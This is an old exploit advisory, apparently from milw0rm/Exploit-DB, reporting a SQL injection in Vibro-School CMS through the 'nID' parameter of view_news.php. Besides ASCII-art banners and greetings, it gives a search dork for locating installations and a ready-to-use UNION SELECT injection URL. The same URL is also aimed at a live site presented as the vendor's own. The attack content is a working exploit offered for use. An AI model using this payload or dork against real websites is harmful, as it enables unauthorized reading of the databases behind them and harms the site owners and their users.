Vibro-School-CMS - 'nID' SQL Injection

EDB-ID:

6981




Platform:

PHP

Date:

2008-11-04


*********************************************************************************************        
[!]                                                                                       [!]
[!] OOOO             O                                 OOOOOOOOO                          [!]
[!]O    O            O                                 O      O                           [!]
[!]O                 O                                       O                            [!]
[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
[!]          OO                                                                           [!]
[!]         OO                                                                            [!]
[!]        OO                          Proud To Be MoroCCaN                               [!]
[!]       OO                                                                              [!]
*********************************************************************************************
Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
---------------------------------------------------------------------------------------------
=                Vibro-School CMS (nID) Remote SQL injection Vulnerability                  =
---------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  SQL InjEction By : Cyber-Zone                                          =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.IQ-Ty.CoM                                                   =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Download : http://www.niclor.net/prodotti/Vibro-School-CMS


dork    : Vibro-School CMS by nicLOR.net

Exploit : http://localhost/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--


live demo :


http://www.niclor.net/prodotti/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--

---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
-=                                                                                         =-
-=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
-=                                                                                         =-
-=                               Oujda SeCurity TeaM                                       =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Spicial ThanX To My Friend StaCk & All KazaWa Boys :)

# milw0rm.com [2008-11-04]